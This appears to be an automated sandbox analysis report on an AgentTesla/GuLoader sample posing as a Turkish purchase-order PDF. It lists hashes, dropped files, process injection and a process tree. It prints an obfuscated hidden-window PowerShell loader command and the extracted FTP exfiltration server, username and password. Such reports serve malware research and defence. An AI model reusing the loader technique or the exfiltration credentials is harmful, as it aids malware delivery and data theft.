Analysis
-
max time kernel
138s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231130-en -
resource tags
arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system -
submitted
11-12-2023 10:16
Static task
static1
Behavioral task
behavioral1
Sample
SİPARİŞ NO.ZD33166-pdf.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
SİPARİŞ NO.ZD33166-pdf.exe
Resource
win10v2004-20231130-en
General
-
Target
SİPARİŞ NO.ZD33166-pdf.exe
-
Size
684KB
-
MD5
8db600d5b4168b5d358209fa4b85bd5f
-
SHA1
d6822e043548fbacd692a14d7dc17250482c43bc
-
SHA256
2ef9a5215999c03ea03636ae06f8c66b3ed1274153bdaec215a189cd148669b5
-
SHA512
c2103215579019f69aa3e4adfa2067d90c9189c093c7b065e9693e3d8745f084810e7652dd0e2e6638eecc18344641aaa23460eb2799c3829b73462b08f741ca
-
SSDEEP
12288:swFGHEDwfu4MFVS/GCFj+an2ry7/hFwz7ylgimtdYM3O0V7bbj:s5HEMfuDDSuCF6an2rg/hF7lgZtub0Vv
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.vvspijkenisse.nl - Port:
21 - Username:
[email protected] - Password:
playingboyz231
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Haglskadeforsikring\Miljankenvnet.ini SİPARİŞ NO.ZD33166-pdf.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4088 msbuild.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3284 powershell.exe 4088 msbuild.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3284 set thread context of 4088 3284 powershell.exe 104 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files (x86)\cockling.lnk SİPARİŞ NO.ZD33166-pdf.exe File opened for modification C:\Program Files (x86)\cockling.lnk SİPARİŞ NO.ZD33166-pdf.exe File opened for modification C:\Program Files (x86)\Kldebonnets.kod SİPARİŞ NO.ZD33166-pdf.exe File opened for modification C:\Program Files (x86)\Common Files\integraltegnets\substrate.Ski SİPARİŞ NO.ZD33166-pdf.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\bagvognen.lnk SİPARİŞ NO.ZD33166-pdf.exe File opened for modification C:\Windows\Calottes.Doo SİPARİŞ NO.ZD33166-pdf.exe File opened for modification C:\Windows\bagvognen.lnk SİPARİŞ NO.ZD33166-pdf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3692 4088 WerFault.exe 104 -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3284 powershell.exe 3284 powershell.exe 3284 powershell.exe 3284 powershell.exe 3284 powershell.exe 3284 powershell.exe 3284 powershell.exe 3284 powershell.exe 4088 msbuild.exe 4088 msbuild.exe 4088 msbuild.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3284 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3284 powershell.exe Token: SeDebugPrivilege 4088 msbuild.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3376 wrote to memory of 3284 3376 SİPARİŞ NO.ZD33166-pdf.exe 92 PID 3376 wrote to memory of 3284 3376 SİPARİŞ NO.ZD33166-pdf.exe 92 PID 3376 wrote to memory of 3284 3376 SİPARİŞ NO.ZD33166-pdf.exe 92 PID 3284 wrote to memory of 4088 3284 powershell.exe 104 PID 3284 wrote to memory of 4088 3284 powershell.exe 104 PID 3284 wrote to memory of 4088 3284 powershell.exe 104 PID 3284 wrote to memory of 4088 3284 powershell.exe 104 PID 3284 wrote to memory of 4088 3284 powershell.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\SİPARİŞ NO.ZD33166-pdf.exe"C:\Users\Admin\AppData\Local\Temp\SİPARİŞ NO.ZD33166-pdf.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Osirify120=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Bojanna.Win';$Calvarias=$Osirify120.SubString(53221,3);.$Calvarias($Osirify120)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4088 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 18604⤵
- Program crash
PID:3692
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4088 -ip 40881⤵PID:4952
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
32B
MD5a8ca1db6ae34f5e5c152094f44f92476
SHA19fe0fd4e6907c4f9099d2533c3bade4ffa0968e7
SHA2561f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3
SHA512e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
52KB
MD5b78df76358c01d725b0d9e498d32d595
SHA189c5bc6f9d1d1da207899ce0677c24a99329dc70
SHA2566cacb39cdff332ae98782d33db6fc877a76a8e1e01fa7a0ec9acf45a19cca2ea
SHA512d7268e8c0e6040515d385835206af5b67c78ec5f6c4bdf7053ec28c00e3dcfdfa318fd03935e989bd856e3614a2ebb2d8bc50e2ecdbe7433b211291b0746cf8d
-
Filesize
270KB
MD5ec46e3263c35f658579cd1572e57def0
SHA118468cb8363e04d8257fd5503cc6350ff7432b88
SHA256690cdbe972c183ace073bad0f8567a3f2f2f15bf3f31e0e714797fdd68bc4e03
SHA512d283ea4285dd37379499dc45128449b05b41229149d22819d3b40f80deba233be346741242d6f64f0697562f1fbec5d2818b7d05e0a4d95692246334bca85768